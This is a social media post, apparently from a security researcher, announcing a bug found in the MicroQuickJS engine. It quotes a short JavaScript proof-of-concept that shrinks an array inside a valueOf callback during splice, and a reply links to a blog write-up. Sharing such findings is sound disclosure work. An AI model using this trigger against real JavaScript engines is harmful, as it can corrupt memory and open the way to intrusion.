Amy B @nyanbox.stackchk.fail · Jan 12

When MicroQuickJS released, I spent 8.5 hours to summon an Exploit for it. Here is the Fault: var arr = new Array(30) var attack = { valueOf: function() { arr.length = 0 arr.length = 3 return 10 } } arr.splice(attack, 30) I document the full Ritual Process below

8 likes 1 replies

?

Replies

Amy B · Jan 12

The following will be based on excerpts from my first edition print of "Performing A Ritual To Hack MicroQuickJS": stackchk.fail/blog/mquickj...